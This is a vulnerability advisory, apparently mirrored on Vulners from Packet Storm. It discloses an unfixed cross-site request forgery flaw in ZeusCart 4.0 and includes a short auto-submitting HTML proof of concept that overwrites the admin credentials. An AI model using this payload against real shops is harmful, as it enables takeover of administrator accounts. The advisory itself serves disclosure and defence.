Lucene search
K

ZeusCart 4.0 Cross Site Request Forgery

🗓️ 16 Sep 2015 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

ZeusCart 4.0 CSRF vulnerability not fixe

Code
`ZeusCart 4.0: CSRF  
Security Advisory – Curesec Research Team  
  
1. Introduction  
  
Affected Product: ZeusCart 4.0   
Fixed in: not fixed  
Fixed Version Link: n/a   
Vendor Contact: [email protected]   
Vulnerability Type: CSRF   
Remote Exploitable: Yes   
Reported to vendor: 08/13/2015   
Disclosed to public: 09/14/2015   
Release mode: Full Disclosure   
CVE: n/a   
Credits Tim Coen of Curesec GmbH   
  
2. Vulnerability Description  
  
None of the forms of Zeuscart have CSRF protection, which means that an  
attacker can perform actions for the victim if the victim visits an  
attacker controlled site while logged in.  
3. Proof of Concept  
  
Change Admin Credentials:  
  
<form name="myform" method="post"  
action="http://localhost/zeuscart-master/admin/?do=adminprofile&action=update"  
enctype="multipart/form-data">  
<input type="hidden" name="admin_name" value="admin2">  
<input type="hidden" name="admin_email" value="[email protected]">  
<input type="hidden" name="admin_password" value="admin">  
</form>  
<script>document.myform.submit();</script>  
  
4. Solution  
  
This issue was not fixed by the vendor.  
  
5. Report Timeline  
  
08/13/2015 Informed Vendor about Issue (no reply)  
09/07/2015 Reminded Vendor of release date (no reply)  
09/14/2015 Disclosed to public  
  
6. Blog Reference  
http://blog.curesec.com/article/blog/ZeusCart-40-CSRF-58.html  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation